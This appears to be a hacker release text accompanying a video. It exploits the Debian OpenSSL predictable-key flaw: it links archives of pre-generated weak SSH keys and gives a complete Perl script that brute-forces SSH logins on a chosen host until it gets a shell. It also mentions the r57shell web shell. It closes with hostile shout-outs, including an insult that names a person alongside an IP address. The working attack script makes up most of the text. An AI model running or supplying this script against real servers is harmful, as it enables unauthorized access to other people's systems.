--------------------------------------------------------- --- Debian OpenSSL Bruteforce --- author: F0rtress Zer0 (mail - last frame) --------------------------------------------------------- music: Trent Reznor - Damnation (from quake) Pre-generated keyfiles: http://sugar.metasploit.com/debian_ssh_dsa_1024_x86.tar.bz2 http://sugar.metasploit.com/debian_ssh_rsa_2048_x86.tar.bz2 <- THIS USED http://milw0rm.com/sploits/debian_ssh_rsa_2048_x86.tar.bz2 <- MIRROR http://sugar.metasploit.com/debian_ssh_rsa_1023_x86.tar.bz2 http://sugar.metasploit.com/debian_ssh_rsa_1024_x86.tar.bz2 http://sugar.metasploit.com/debian_ssh_rsa_2047_x86.tar.bz2 http://sugar.metasploit.com/debian_ssh_rsa_4096_x86.tar.bz2 http://sugar.metasploit.com/debian_ssh_rsa_8192_1_4100_x86.tar.bz2 Brutforcer script code: --- BEGIN --- #!/usr/bin/perl use strict; use warnings; ## SSH keyfile bruteforce script ## Coded by Fortress Zero (nomina.sunt.odiosa@gmail.com) my $keysPerConnect = 6; my $usage = "\nUsage: ./script.pl \n"; my $path = shift or die($usage."Path to keys is not specified\n"); my $host = shift or die($usage."Host is not specified\n"); my $login = shift or die($usage."Login is not specified\n"); die or chdir($path); opendir(A, $path) or die("\nerr: could not open dir\n"); print "\nCounting all keys...\n"; my @kez; while ($_ = readdir(A)) { chomp; # filter only private keys next unless m,^\w+-\d+$,; push(@kez, $_); } my $full = $#kez+1; print "TOTAL ".$full." number of keys\n"; print "BRUTEFORCE attack start\n"; my $cmdsCount = int($full/$keysPerConnect); my $pre_cmd = "ssh -o \"BatchMode yes\" -l ".$login; my $post_cmd = ' '.$host.' "id;exit"'; my $clock_start = time(); my $time_elapsed = 0; my $time_left = 0; for(my $i = 1; $i <= $cmdsCount; $i++){ $time_elapsed = time()-$clock_start; $time_left = int($time_elapsed/$i*($cmdsCount-$i)); printf "%06d/%06d - %02d:%02d:%02d/%02d:%02d:%02d\n", $i, $cmdsCount, (gmtime($time_elapsed))[2], (gmtime($time_elapsed))[1], (gmtime($time_elapsed))[0], (gmtime($time_left))[2], (gmtime($time_left))[1], (gmtime($time_left))[0]; my $mid_cmd = ''; for(my $j = 0; $j < $keysPerConnect; $j++){ my $cur = shift(@kez); $mid_cmd.= " -i ".$cur; } my $ret = system($pre_cmd.$mid_cmd.$post_cmd); if($ret!=65280){ ## seems that we've got shell my @valid = split ' -i ',$mid_cmd; shift @valid; print "Valid pack of keys found\n"; print "Trying to determine correct key...\n"; foreach (@valid) { print $_."\n"; my $ret2 = system($pre_cmd.' -i '.$_.$post_cmd); if($ret2!=65280){ print "PRIVATE KEY FOUND\nTHIS IS IT -> ".$_." <-\n"; die("SUCCESS!!!!\n"); } } print "Looks like false alarm...\n"; } } print "Small amount of keys remaining,\nTrying one-by-one\n"; foreach (@kez) { print $_."\n"; my $ret3 = system($pre_cmd.' -i '.$_.$post_cmd); if($ret3!=65280){ print "You fucking lucky!\n"; print "PRIVATE KEY FOUND\nTHIS IS IT -> ".$_." <-\n"; die("SUCCESS!!!!\n"); } } print "SHIT! BRUTEFORCE FAILED!\n"; exit; --- END --- Software seen in video: - Windows XP SP2 - OperaUSB 9.51 - r57shell 1.4 - portaputty - Ubuntu 7.10 Software used for creation: - MS Virtual PC 2007 - VMWare Player - Ubuntu 7.10 (2 times) - BB Flashback recorder 1.5.6 - Macromedia Flash MX 2004 - Nero WaveEditor 3.9.1.0 - Audacity 1.2.6 - DivX Codec - LAME MP3 encoder/decoder --- Hack the planet! Keep private! Cheat script-kiddies! --- Hello gobzer! Hello Molot! Hello AFX! Hello flufx! Hello kostapc! hello unknown from cc06 (nokia, your DVD) - contact me! --- Fuck you Trash !!!(245659,982399,tgbr,92.245.59.233) Antichat abused my video! I HATE YOU! --- I know kung-foo You can now hire me for something legal - contact thru email